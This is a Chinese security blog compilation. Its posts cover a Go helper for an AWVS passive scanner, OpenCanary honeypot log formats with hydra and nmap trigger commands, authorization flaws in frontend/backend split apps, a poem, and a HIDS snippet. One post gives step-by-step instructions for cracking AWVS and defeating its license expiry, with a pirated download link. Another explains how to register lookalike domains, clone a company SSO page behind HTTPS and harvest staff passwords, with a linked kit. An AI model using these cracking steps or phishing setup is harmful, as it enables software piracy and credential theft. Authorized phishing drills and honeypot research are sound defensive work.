上述代码只是demo，提供tv对接实盘的参考。tv也可以通过webhook对接fmz.com发明者量化交易平台。tv听说也有chrome插件之类的对接啥啥的。

我现在已经不是这种略显笨拙的方法去回测，去对接实盘。

因为不懂金融也不懂交易，我跟朋友通过tv上或者网络上别人开源的策略进行优化，然后把tv上用pine script语言写的脚本改写成python，在fmz上回测更精准，在fmz上对接实盘更容易一些，如此拾人牙慧（好可怜）～

钱没赚到，表情倒是收藏了一大堆！我还有几个难兄难弟等着我的策略上车致富呢～不说了，先跑个半年看看…

被动扫描器研发（1）：golang生成cdata xml格式数据

2020-02-22T11:34:33.000Z

背景

我已经把awvs变成了被动扫描器引擎，其中一些关键环节，我会做一些总结以笔记形式发出来。

awvs可以通过导入burpsuite的导出xml文件作为被动扫描器流量的流量输入，它还可以接收如下所述的数据格式

Accepted formats include text file with a list of URLs (.txt), Fiddler session archives (.saz), Swagger files (.json, .yaml or .yml), Web Services Definition Files (.wsdl), BURP saved files (.xml) and state files, Selenium (.html, .side), Web Application Description Language (.wadl), ASP.NET Web Forms Project Files (.csproj, .vbproj), Paros log files (.session.data), Postman Collections v2 (.json) or HTTP archive files (*.har)

原burpsuite xml导出数据格式
























]>
<items burpVersion="2.1.06" exportTime="Tue Feb 04 17:55:42 CST 2020">
  <item>
    <time>Tue Feb 04 17:55:28 CST 2020time>
    <url>url>
    <host ip="192.168.0.108">192.168.0.108host>
    <port>80port>
    <protocol>httpprotocol>
    <method>method>
    <path>path>
    <extension>nullextension>
    <request base64="true">request>
    <status>404status>
    <responselength>4842responselength>
    <mimetype>HTMLmimetype>
    <response base64="true">response>
    <comment>comment>
  item>
items>

精简后xml数据格式：

为什么需要精简成如下数据格式？因为经过调研调试，发现url节点是必须的，而request节点awvs会在post请求中使用，method节点多一个也不多，就顺便带入。其他节点删除后，并没有明显的影响漏洞扫描结果数据。在awvs12中url节点还不是必须的，而awvs13不设置url节点会无法扫描”terminate called after throwing an instance of ‘ax::utility::WvsException’\n what(): HttpJob: unable to set url:”。

<items burpVersion="2.1.06">
    <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
items>

cdata xml with golang of export burpsuite

package main

import (
"encoding/xml"
"fmt"
)

type items struct {
XMLName xml.Name `xml:"items"`
Version string   `xml:"burpVersion,attr"`
Itemlist []item `xml:"item"`
}
type item struct {
URL CdataStringUrl`xml:"url"`
METHOD CdataStringMethod `xml:"method"`
Req CdataString `xml:"request"`
}


type CdataString struct {
Value string `xml:",cdata"`
Base64 string `xml:"base64,attr"`
}

type CdataStringUrl struct {
Value string `xml:",cdata"`
}

type CdataStringMethod struct {
Value string `xml:",cdata"`
}

func main() {
v := &items{Version: "2.1.06"}
for i:=0;i<10;i++{

v.Itemlist = append(v.Itemlist, item{URL:CdataStringUrl{Value:"http://123.com"}, METHOD:CdataStringMethod{Value:"GET"}, Req: CdataString{Value: "bbbccc", Base64:"true"}})
}
output, err := xml.MarshalIndent(v, "", "  ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
fmt.Println(string(output))
}

输出结果：
对base64数据在demo中没有转码，这里只做整体数据格式参考

<items burpVersion="2.1.06">
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
  <item>
    <url>url>
    <method>method>
    <request base64="true">request>
  item>
items>

awvs（12.0.190515149）linux 安装和破解

2019-06-17T15:26:33.000Z

升级Ubuntu操作系统

1	do-release-upgrade

升级完成后版本为Ubuntu 18.04.2 LTS \n \l

安装软件依赖

1	sudo apt-get install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 libx11-xcb-dev

若安装出错，可参考我的下列步骤：

可能安装的并不顺利，尤其libx11-xcb-dev，这时候你需要根据错误提示安装它的合适版本的依赖包。

1
2
3

sudo apt-get install libxdmcp6=1:1.1.2-1.1
sudo apt-get install libxcb1=1.11.1-1ubuntu1
sudo apt-get install libxcb1-dev

从官网下载最新的awvs linux版本

下载地址：https://www.acunetix.com/web-vulnerability-scanner/demo/

填写好申请人的邮箱等信息，提交就可以跳转到真实的软件包下载地址。

截止2019-06-17 15:57:39我下载的最新版本为Version: 12.0.190515149(15 May 2019)

不想从官网下载或者官网已经取消这种下载流程的，可以从本文底部的下载链接进行下载。

安装awvs

1
2
3

chmod 777 acunetix_trial.sh
sudo ./acunetix_trial.sh
.....当你输入了上面的命令之后，会进行安装，其中包括阅读它的使用协议，回车到输入yes，然后输入一系列内容。直到安装完成。

awvs修改端口

默认的awvs的端口是13443，因为其他原因我需要把端口修改为443.
调试过程就略了。。。直接给出解决方案吧。

修改web端口

1	vi /home/acunetix/.acunetix_trial/wvs.ini

将server.port=13443改为server.port=443

添加/etc/sudoers，免密码可sudo用户。

编辑/etc/sudoers

1	vi /etc/sudoers

加一行内容，并保存

1	acunetix ALL=(ALL) NOPASSWD: ALL

在/home/acunetix/.acunetix_trial/start.sh第19行，行首添加sudo。

重新启动awvs

sudo systemctl restart acunetix_trial.service

启动和停止命令
sudo systemctl start acunetix_trial.service
sudo systemctl stop acunetix_trial.service

破解awvs

注意要把破解补丁复制/home/acunetix/.acunetix_trial/v_190515149/scanner/目录下，其中v_190515149是你的awvs安装完成后根据版本生成的目录。

apt-get install unzip
unzip patch_awvs.zip
cd /home/acunetix/.acunetix_trial/v_190515149/scanner/
sudo cp ~/patch_awvs .
sudo ./patch_awvs

破解成功后会显示：

< xs3c.co >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
Crack by bigchan.Tested on v_190325161.
Usage: Copy me to the scanner folder and run as root.

Check environment.
Generating license.
Patch executable.
Jobs done, there you go.

保护license不失效

执行完成patch之后，尽快执行如下的命令，不然license会被修改的。

1	chattr +i /home/acunetix/.acunetix_trial/data/license/license_info.json

awvs破解后14天失效问题解决

—————–2019-08-16 19:35:27更新——————————

最开始我参考网络上的文章进行破解，发现破解成功。但后来10几天过去了，再登录到awvs里新建了任务，发现扫描失败。通过日志的查看和命令行模式的调试

1	/home/acunetix/.acunetix_trial/v_190325161/scanner/wvsc /scan http://xxx.com /profile xss /satus /log logfile.txt

发现是license过期了。

参考下t00ls上的帖子《Linux AWVS 12完美破解！！！》:
https://www.t00ls.net/viewthread.php?tid=52159

1 2	好多大佬说，破解完成后用段时间就失效了，扫不了了。只要删除wa_data.dat文件即可。亲测可用！！！ rm /home/acunetix/.acunetix_trial/data/license/wa_data.dat

在安装完成之后，删除wa_data.bat文件，确实可用。但是10几天之后，awvs会自动再次生成wa_data.bat文件，查看报错提示是license error。

解决：

1
2
3

rm  /home/acunetix/.acunetix_trial/data/license/wa_data.dat
touch /home/acunetix/.acunetix_trial/data/license/wa_data.dat
chattr +i /home/acunetix/.acunetix_trial/data/license/wa_data.dat

意思是到期之后将wa_data.dat文件删除，然后手动创建一个wa_data.dat，最后锁定wa_data.dat文件不可写入。

目前awvs破解之后的版本依然可用。

给个awvs的安装包下载地址：
https://mega.nz/#F!xOA00CSI!BOvzk-O4SFVlSuep0KAHJw

opencanary二次开发(1)-日志格式

2019-01-15T12:25:55.000Z

关键代码

opencanary/modules目录下为模拟的服务或协议脚本。
opencanary/logger.py 为日志生成脚本，我就是在这个文件里直接改了几行代码向web端发送日志，例如post2server函数和log函数；且LoggerBase类定义了各种日志类型。

日志格式xmind

我将opencanary蜜罐框架分析的日志和服务（协议）用xmind进行记录，方便有兴趣的同学进行对照着开发。
其中opencanary_web数据库honeypot的OpencanaryLog表的字段也是根据根据日志所包含的所有字段进行设计和开发中随时扩表的。

监听端口

当把opencanary配置选项全部开启之后

tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:1433            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:3389            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:8001            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:9418            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      12683/python
tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN      12683/python
udp        0      0 0.0.0.0:57197           0.0.0.0:*                           8994/python
udp        0      0 0.0.0.0:5060            0.0.0.0:*                           12683/python
udp        0      0 0.0.0.0:69              0.0.0.0:*                           12683/python
udp        0      0 0.0.0.0:123             0.0.0.0:*                           12683/python
udp        0      0 0.0.0.0:161             0.0.0.0:*                           12683/python

应用日志

HTTP

触发方式

访问蜜罐http页面

日志格式

{"dst_host": "172.18.200.58", "dst_port": 80, "local_time": "2019-01-07 13:47:45.817940", "logdata": {"HOSTNAME": "172.18.200.58", "PASSWORD": "admin888", "PATH": "/index.html", "SKIN": "nasLogin", "USERAGENT": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:61.0) Gecko/20100101 Firefox/61.0", "USERNAME": "admin"}, "logtype": 3001, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 54488}

FTP

触发方式

任意ftp客户端

日志格式

{"dst_host": "172.18.200.58", "dst_port": 21, "local_time": "2019-01-07 13:50:54.264032", "logdata": {"PASSWORD": "admin123", "USERNAME": "ftpadmin"}, "logtype": 2000, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 54573}

SSH

触发方式

任意SSH客户端

日志格式

{"dst_host": "172.18.200.58", "dst_port": 2222, "local_time": "2019-01-07 13:54:27.811101", "logdata": {"SESSION": "3"}, "logtype": 4000, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 54639}

{"dst_host": "172.18.200.58", "dst_port": 2222, "local_time": "2019-01-07 13:54:27.888686", "logdata": {"LOCALVERSION": "SSH-2.0-OpenSSH_5.1p1 Debian-4", "REMOTEVERSION": "SSH-2.0-OpenSSH_7.0 ZOC_7.16.1"}, "logtype": 4001, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 54639}

{"dst_host": "172.18.200.58", "dst_port": 2222, "local_time": "2019-01-07 13:54:32.444224", "logdata": {"LOCALVERSION": "SSH-2.0-OpenSSH_5.1p1 Debian-4", "PASSWORD": "root123", "REMOTEVERSION": "SSH-2.0-OpenSSH_7.0 ZOC_7.16.1", "USERNAME": "root"}, "logtype": 4002, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 54639}

Telnet

触发方式

telnet 172.18.200.58

日志格式

{"dst_host": "172.18.200.58", "dst_port": 23, "honeycred": false, "local_time": "2019-01-07 13:56:45.341785", "logdata": {"PASSWORD": "admin888", "USERNAME": "admin123"}, "logtype": 6001, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 54676}

MYSQL

触发方式

mysql -h172.18.200.58 -uroot -p

日志格式

{"dst_host": "172.18.200.58", "dst_port": 3306, "local_time": "2019-01-07 13:58:25.922257", "logdata": {"PASSWORD": "18076c09615de80ddb2903191b783714918b4c4f", "USERNAME": "root"}, "logtype": 8001, "node_id": "opencanary-1", "src_host": "172.18.220.253", "src_port": 46662}

git协议

触发方式

git clone git://192.168.1.7:9418/tmp.git

日志格式

{"dst_host": "192.168.1.7", "dst_port": 9418, "local_time": "2019-01-05 15:38:46.368627", "logdata": {"HOST": "192.168.1.7:9418", "REPO": "tmp.git"}, "logtype": 16001, "node_id": "opencanary-1", "src_host": "192.168.1.3", "src_port": 57606}

NTP协议

触发方式

git clone git://192.168.1.7:9418/tmp.git

ntp监听的是udp的123端口

日志格式

{"dst_host": "0.0.0.0", "dst_port": 123, "local_time": "2019-01-05 15:58:52.075987", "logdata": {"NTP CMD": "monlist"}, "logtype": 11001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 57886}

redis

触发方式

(env) [root@honeypot Honeypot]# redis-cli -h 192.168.1.7
192.168.1.7:6379> keys *
(error) NOAUTH Authentication required.
192.168.1.7:6379> config get requirepass
(error) ERR unknown command 'config'
192.168.1.7:6379> auth admin
(error) ERR invalid password
192.168.1.7:6379>

日志格式

{"dst_host": "192.168.1.7", "dst_port": 6379, "local_time": "2019-01-05 16:05:11.637269", "logdata": {"ARGS": "", "CMD": "COMMAND"}, "logtype": 17001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 34471}

{"dst_host": "192.168.1.7", "dst_port": 6379, "local_time": "2019-01-05 16:08:14.786249", "logdata": {"ARGS": "*", "CMD": "KEYS"}, "logtype": 17001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 34471}

{"dst_host": "192.168.1.7", "dst_port": 6379, "local_time": "2019-01-05 16:09:36.418200", "logdata": {"ARGS": "get requirepass", "CMD": "CONFIG"}, "logtype": 17001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 34471}

{"dst_host": "192.168.1.7", "dst_port": 6379, "local_time": "2019-01-05 16:10:09.802402", "logdata": {"ARGS": "admin", "CMD": "AUTH"}, "logtype": 17001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 34471}

触发方式

telnet 192.168.1.6 8001

日志格式

{"dst_host": "192.168.1.6", "dst_port": 8001, "local_time": "2019-01-05 17:18:51.601478", "logdata": {"BANNER_ID": "1", "DATA": "", "FUNCTION": "CONNECTION_MADE"}, "logtype": 18002, "node_id": "opencanary-1", "src_host": "192.168.1.3", "src_port": 59176}

{"dst_host": "192.168.1.6", "dst_port": 8001, "local_time": "2019-01-05 17:19:12.996007", "logdata": {"BANNER_ID": "1", "DATA": "", "FUNCTION": "DATA_RECEIVED"}, "logtype": 18004, "node_id": "opencanary-1", "src_host": "192.168.1.3", "src_port": 59176}

LOG_TCP_BANNER_CONNECTION_MADE = 18001
LOG_TCP_BANNER_KEEP_ALIVE_CONNECTION_MADE = 18002
LOG_TCP_BANNER_KEEP_ALIVE_SECRET_RECEIVED = 18003
LOG_TCP_BANNER_KEEP_ALIVE_DATA_RECEIVED = 18004
LOG_TCP_BANNER_DATA_RECEIVED = 18005

VNC

触发方式

我在mac电脑上用vnc viewer连接

日志格式

{"dst_host": "192.168.1.7", "dst_port": 5000, "local_time": "2019-01-06 08:21:28.951940", "logdata": {"VNC Client Response": "58c00be9ee5b7f3b666771dd2bda9309", "VNC Password": "", "VNC Server Challenge": "953e2dff7e4d3a3114527c282817ce1d"}, "logtype": 12001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 54634}

RDP

触发方式

我在mac电脑上用Microsoft Remote Desktop Beta.app连接

日志格式

{"dst_host": "192.168.1.7", "dst_port": 3389, "local_time": "2019-01-06 08:59:13.890934", "logdata": {"DOMAIN": "", "HOSTNAME": "HelloHost", "PASSWORD": "helloword", "USERNAME": "administrator1"}, "logtype": 14001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 59955}

{"dst_host": "192.168.1.7", "dst_port": 3389, "local_time": "2019-01-06 08:59:26.868856", "logdata": {"INPUT": ""}, "logtype": 14001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": 59955}

windows console模式登录的会出现INPUT字段

SIP

触发方式

hydra -l adminsip -p password 192.168.1.7 sip

日志格式

{"dst_host": "0.0.0.0", "dst_port": 5060, "local_time": "2019-01-06 09:55:12.578148", "logdata": {"HEADERS": {"call-id": ["1337@192.168.1.7"], "content-length": ["0"], "cseq": ["1 REGISTER"], "from": [""], "to": [""], "via": ["SIP/2.0/UDP 10.0.2.15:46759;received=192.168.1.7"]}}, "logtype": 15001, "node_id": "opencanary-1", "src_host": "192.168.1.7", "src_port": 46759}

SNMP

触发方式

hydra -p password 192.168.1.7 snmp

日志格式

{"dst_host": "0.0.0.0", "dst_port": 161, "local_time": "2019-01-06 11:17:27.266214", "logdata": {"COMMUNITY_STRING": "password", "REQUESTS": ["1.3.6.1.2.1.1.1"]}, "logtype": 13001, "node_id": "opencanary-1", "src_host": "192.168.1.7", "src_port": 47112}

NMAP

OS探测触发方式

sudo nmap -v -Pn -O 192.168.1.7

日志格式

{"dst_host": "192.168.1.7", "dst_port": "21", "local_time": "2019-01-06 16:35:24.356080", "logdata": {"FIN": "", "ID": "37499", "IN": "eth1", "LEN": "60", "MAC": "08:00:27:da:4c:e2:6c:96:cf:dd:ee:bd:08:00", "OUT": "", "PREC": "0x00", "PROTO": "TCP", "PSH": "", "RES": "0x00", "SYN": "", "TOS": "0x00", "TTL": "56", "URG": "", "URGP": "0", "WINDOW": "256"}, "logtype": 5002, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": "40098"}

SYN探测触发方式

sudo nmap -sS 192.168.1.7

日志格式

{"dst_host": "192.168.1.7", "dst_port": "21", "local_time": "2019-01-06 16:35:24.190176", "logdata": {"ID": "51918", "IN": "eth1", "LEN": "56", "MAC": "08:00:27:da:4c:e2:6c:96:cf:dd:ee:bd:08:00", "OUT": "", "PREC": "0x00", "PROTO": "TCP", "RES": "0x00", "SYN": "", "TOS": "0x00", "TTL": "58", "URGP": "0", "WINDOW": "512"}, "logtype": 5001, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": "40088"}

FIN探测触发方式

sudo nmap -sF 192.168.1.7

日志格式

{"dst_host": "192.168.1.7", "dst_port": "23", "local_time": "2019-01-06 16:46:18.336954", "logdata": {"FIN": "", "ID": "29768", "IN": "eth1", "LEN": "40", "MAC": "08:00:27:da:4c:e2:6c:96:cf:dd:ee:bd:08:00", "OUT": "", "PREC": "0x00", "PROTO": "TCP", "RES": "0x00", "TOS": "0x00", "TTL": "59", "URGP": "0", "WINDOW": "1024"}, "logtype": 5005, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": "35116"}

XmasTree探测触发方式

sudo nmap -sX 192.168.1.7

日志格式

{"dst_host": "192.168.1.7", "dst_port": "139", "local_time": "2019-01-06 16:48:46.225539", "logdata": {"FIN": "", "ID": "19984", "IN": "eth1", "LEN": "40", "MAC": "08:00:27:da:4c:e2:6c:96:cf:dd:ee:bd:08:00", "OUT": "", "PREC": "0x00", "PROTO": "TCP", "PSH": "", "RES": "0x00", "TOS": "0x00", "TTL": "56", "URG": "", "URGP": "0", "WINDOW": "1024"}, "logtype": 5004, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": "50913"}

Null探测触发方式

sudo nmap -sN 192.168.1.7

日志格式

{"dst_host": "192.168.1.7", "dst_port": "5060", "local_time": "2019-01-06 16:51:07.789903", "logdata": {"ID": "26441", "IN": "eth1", "LEN": "40", "MAC": "08:00:27:da:4c:e2:6c:96:cf:dd:ee:bd:08:00", "OUT": "", "PREC": "0x00", "PROTO": "TCP", "RES": "0x00", "TOS": "0x00", "TTL": "50", "URGP": "0", "WINDOW": "1024"}, "logtype": 5003, "node_id": "opencanary-1", "src_host": "192.168.1.6", "src_port": "58015"}

MSSQL

mssql登录sql账户认证

SQLPro for MSSQL

日志格式

{"dst_host": "172.18.200.58", "dst_port": 1433, "local_time": "2019-01-07 09:04:58.690137", "logdata": {"AppName": "SQLPro for MSSQL (hankinsoft.com)", "CltIntName": "DB-Library", "Database": "test", "HostName": "Piroguehost", "Language": "us_english", "Password": "sa123456", "ServerName": "172.18.200.58:1433", "UserName": "sa"}, "logtype": 9001, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 64344}

mssql登录win身份认证

SQLPro for MSSQL

日志格式

{"dst_host": "172.18.200.58", "dst_port": 1433, "local_time": "2019-01-07 09:13:28.669829", "logdata": {"PASSWORD": "", "USERNAME": ""}, "logtype": 9002, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 64499}

HTTPPROXY

触发方式

可以通过浏览器配置一个带有认证的http代理，随便访问一个链接。

日志格式

{"dst_host": "172.18.200.58", "dst_port": 8080, "local_time": "2019-01-07 13:26:47.761297", "logdata": {"PASSWORD": "passsquid", "USERNAME": "squidadmin"}, "logtype": 7001, "node_id": "opencanary-1", "src_host": "172.18.205.14", "src_port": 53798}

SMB

暂时不搞了，因为要依赖系统真实的smb服务。

蜜罐正式开源-简单易用-支持16种协议

2019-01-09T11:10:38.000Z

一、web服务端介绍

Tornado+Vue+Mysql+APScheduler+Nginx+Supervisor

1. 架构图

2. 功能展示

2.1 登录页面

2.2 仪表盘

2.3 主机状态

2.4 攻击列表

2.5 过滤列表

2.6 邮件配置

2.7 白名单ip

二、安装方式

可以选择通过脚本自动化安装，也可以选择手工安装。

三、后台可统计的信息

ftp登录尝试；
http访问请求；
http登录请求；
ssh建立连接；
ssh远程版本发送；
ssh登录尝试；
telnet登录尝试；
全端口(SYN)扫描识别;
NMAP OS扫描识别；
NMAP NULL扫描识别；
NMAP XMAS扫描识别；
NMAP FIN扫描识别；
mysql登录尝试；
git clone请求；
ntp monlist请求（默认关闭）；
redis命令请求；
TCP连接请求；
vnc连接请求；
rdp协议windows远程登录；
snmp扫描；
sip请求；
mssql登录sql账户认证；
mssql登录win身份认证；
http代理登录尝试；

四、项目致谢

Thinkst Applied Research
天使用户群和开源贡献者：
@Weiho @kafka @Pa5sw0rd @Cotton @Aa.Kay @冷白开 @YongShao @Lemon

五、报告问题

在使用过程当中出现任何问题，请点击这里反馈

前后端分离开发风险浅析

2018-12-17T12:39:48.000Z

1. 什么是前后端分离

从职责上区分：
负责交互与展示的部分为前端；
负责提供数据，处理业务的部分为后端。
核心思想是前端html页面通过ajax调用后端的restuful api接口并使用json数据进行交互。

2. 前后端分离架构的优势

1）提高工作效率，分工更加明确
前端只关注前端的事，后端只关心后端的活，两者开发可以同时进行。在后端还没有提供接口的时候，前端可以先通过Mock的方式模拟接口数据。页面的增加和路由的修改也不必再去麻烦后端，页面模板可以重复使用，开发更加灵活。
2）性能提升
前端页面可以按需加载，服务器也不需要解析前端页面，在页面交互及用户体验上有所提升。
3）降低维护成本
页面的调试不再需要后端人员的参与，可以非常快速的定位及发现问题所在，代码重构及可维护性增强。

推荐看一下这篇文章：《前后端分离的思考与实践（一）》，淘宝前端团队从开发角度详细阐释大厂在业务开发中使用前后端分离架构带来的优势，以及为何在前端技术栈要引入Node层。
下面我们就基于SPA+Node+JAVA的架构去聊一下前后端分离中可能存在的安全风险。

3. 安全风险分析

3.1 技术架构

我们从图中可以看到前端工程师负责的静态资源和Node中间层部分开发和后端工程师负责的后端Server业务逻辑的开发。
②当用户携带token和请求业务单号applyNo，向Node.js Server请求，③④Node中间层通过thrift协议将token在用户中心验证并解析取出userid，⑤Node.js Server将userid与业务单号applyNo发送给后端，⑥后端根据传入的userid和业务单号applyNo进行业务逻辑，⑦返回数据。

3.2 越权漏洞的发生

3.2.1 参数归属校验缺失

后端没有校验前端传入的参数是否归属于当前登录用户：因为在第②步中前端的请求暴露在公网中可以任意请求和篡改的，例如我可以请求applyNo=123，也可以请求applyNo=456；虽然前端在第③④步中做了鉴权，并向后端发送了userid，但后端常常没有用到userid（缺少第⑥步中绿色部分），而是在业务逻辑中直接用applyNo进行业务逻辑并返回；这时候攻击者就可以构造大量applyNo请求，越权查询其他人敏感信息。

3.2.2 直接请求后端接口

从图中我们可知，攻击者也可以绕过Node.js Server层，直接向后端Server接口进行请求。即使在做了数据归属校验的情况下，如果直接向后端构造大量userid和applyNo请求，遍历两个参数，也可能造成大量敏感信息泄漏，只不过攻击成本高了许多。

3.2.3 前端框架引入的风险

在我们发现的漏洞案例中，因为前端框架Vue的路由配置模式“#”，而产生的不可预期的高危漏洞风险。
在vue的路由配置中有mode选项，最直观的区别就是在url中 hash 带了一个 # 而history模式是没有#的：
hash mode：

history mode:

而恰恰是因为这个#，导致前端先加载SPA单页应用的index.html可以浏览到后台dashboard等菜单，通过#的锚链接去路由各个前端界面，在浏览单页触发后端接口调用时发现登录态失效才会跳转到首页。
攻击者就会通过forexample.com/#/加载单页前端界面，偷窥web管理后台的相关界面和功能，会存在如下图中的情况：

原则上前端路由即使可以偷窥后台静态资源，也无法获取后端敏感数据，但在实际情况中后端某些接口疏忽了鉴权(例如上图中的/api/host)导致了敏感信息泄露。
我们应在加载index.html单页前进行鉴权，防止类似的事情发生。

4. 解决方案

前端后端一起鉴权，Node层校验登录态，后端校验登录态，同时后端校验数据归属；

Vue-router使用“mode: history”模式，前后端一起配合鉴权。

export default new Router({
    mode: 'history',
    base: 'c',
    routes: [
        {
            path: '/',
            // redirect: '/dashboard'
            redirect: '/dashboard'

        },
      ......

5. 参考链接

Vue-router 中hash模式和history模式的区别
 前后端分离的思考与实践（一）

6. 致谢

感谢团队小伙伴对问题的探讨和开发实践。

异地恋

2018-12-14T12:14:26.000Z

偌大的北京，

也只有花梨坎到望京的两点一线。

红酒杯们前呼后拥挤上，

疾驶也追不上的时间。

你有你的年份，

她有她的澄澈，

焦急地待人品鉴。

在雾霭中，

我挥发着心跳，

只想与这里一切道别。

终于，

我盼到每个周五，

火车票上那小小的蓝天。

日子虽慢，

道阻且长，

我极力褪去一身碎玻璃片。

请紧紧的抱着我，

这个回到你身边的小火炉铁。

我会伴你走过春夏秋冬，

迎接我们的小葡萄叶。

————献给我挚爱的妻子，女本柔弱，为母则刚。

甲方企业安全建设之钓鱼实践的一种姿势

2018-06-26T10:45:00.000Z

效果图

效果图里是某公司的sso登录页，Chrome下同时显示的效果也是https;

欢乐的气氛下，其实大部分不是做安全的小伙伴并不知道为什么自己会中招。

原理和步骤

假设阿里巴巴的公司重要的系统入口是 login.alibaba-inc.com，那你就可以注册一个非常具有迷惑性的域名，例如 alibaba-cin.com。通过cloudflare启用一个login的二级域名，并配置https，然后开发一个一模一样的登录页面就可以进行钓鱼实践了。

1. 注册域名并修改托管dns

首先注册好的钓鱼网站域名： alibaba-cin.com

注册cloudflare账号，并把 alibaba-cin.com 进行网站添加

输入购买的域名，Add Site

Next，下一步

选择免费的方案, Confirm Plan

进行0$支付吧，Purchase

进行dns查询等待

cloudflare扫描你的域名，发现并没有修改成cloudflare的dns，所以检查失败，
这时后点击下方的continue

cloudflare给出提示，你需要把他给定的两个dns拿到域名商的dns处进行修改

域名商处修改成cloudflare的dns，并确定修改

修改成功等待几分钟就生效了，刷新页面看一下

2. 添加子域名A记录

在cf面板dns管理界面，添加A记录

将ip地址指向你的公网web服务器ip（图中为演示，随意填写的ip）

3. 配置单向SSL加密（https）

选择Crypto设置中的Flexible选项

将下面的总是使用https选项打开

将下面的自动https重写选项打开

至此我们已经配置好钓鱼的登录域名，开启https选项，加强迷惑性。

4. 钓鱼网站编码

我们在针对公司进行钓鱼演戏时，并不需要真正开发一套账户体系，只是需要写一个一模一样登录界面，后端接收登录提交的post请求数据即可。

我们浏览器打开需要克隆的目标站，右键源代码把静态html全部复制出来，保存到index.html。

打开页面会发现乱码，很多资源加载不出来

那是因为我们右键源代码复制出来的html里面有很多相对路径，相对路径的资源引用的是目标站的网站路径。我们需要把这种相对路径的资源全部引用目标站的链接，比如/css/bootstrap.min.css改成https://sso.yunxxxxx.com/css/bootstrap.min.css。

前端html如何将内容post到后端web框架呢？

学习一种web框架将目标页面的表单或关键链接替换成我们后端自己的路由；
可能你的目标站的post登录是通过ajax事件向相对路径post数据，这时你只需要把第4步中改好的html替换我的源代码中的index.html即可。

旧Kali Linux 中有一个社工工具setoolkit，我尝试过自动生成的目标站钓鱼页面效果不是太好。这是因为目标站的首页的资源复杂，自动生成钓鱼网站的工具比较难实现完美的克隆并与服务器端交互。所以需要自己有一些coding的能力。

application.py          - 网站配置文件

url.py                  - 网站路由规则

handlers/login.py       - 登录接收数据的逻辑

server.py               - 网站启动文件，启动端口就在这个文件的21行修改

templates/index.html    - 模板文件，该文件是需要你重点替换和修改的静态页

fish.txt                - 接收到的登录用户名和密码的本地文件

logs                    - 日志目录

注意事项和有意思的事情

钓鱼一定要跟公司的上层领导做好沟通，并取得同意支持，不要任性，可能…会被xx。
如果你注册的域名足够巧妙，会取得意想不到的成果：举个例子，当时我注册了一个前公司钓鱼网站的域名，搭建在公网上，并没有做任何事情，神奇的事情发生了。一个周内，我并没有宣传，也没有向外散播，好几个公司同事自投罗网。分析发现，因为注册的域名在手机或电脑上很容易敲错其中的一个字母，比如yun，敲成yum，而且频率较高的部门比较固定为某一类。为了避免不必要的误会，我已经将钓鱼网站域名免费转给了前公司安全的小伙伴。
这招应该对大厂比较管用，员工的基数大，躺着收密码，但要向官方问清楚是否可以采取钓鱼的方式进行；
源码中的index.html我已经把前公司资源的链接换成了不存在的地址，打开后会乱码，因为并不想让前公司当成靶子。
不要乱搞，你应该购买域名隐私保护。
有喜欢挖洞的小伙伴经常找不到https的xss平台，用cloudflare来搭建自己的https xss平台吧，我已经试过了。

微信公众号内没有内容，关注与我在后台进行交流：

使用方法

Git: https://github.com/p1r06u3/phishing

一个python依赖库：
1
pip install tornado

一行命令：

python server.py

或者后台运行

nohup python server.py &

驭龙hids入侵检测功能初探

2018-04-20T08:37:16.000Z

一、进程实时监控

通过hook技术在windows和Linux操作系统的ring0级别进行监控进程和命令执行。

Windows：

NT式驱动服务开机自启动：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services

net start pro

二、网络链接实时监控

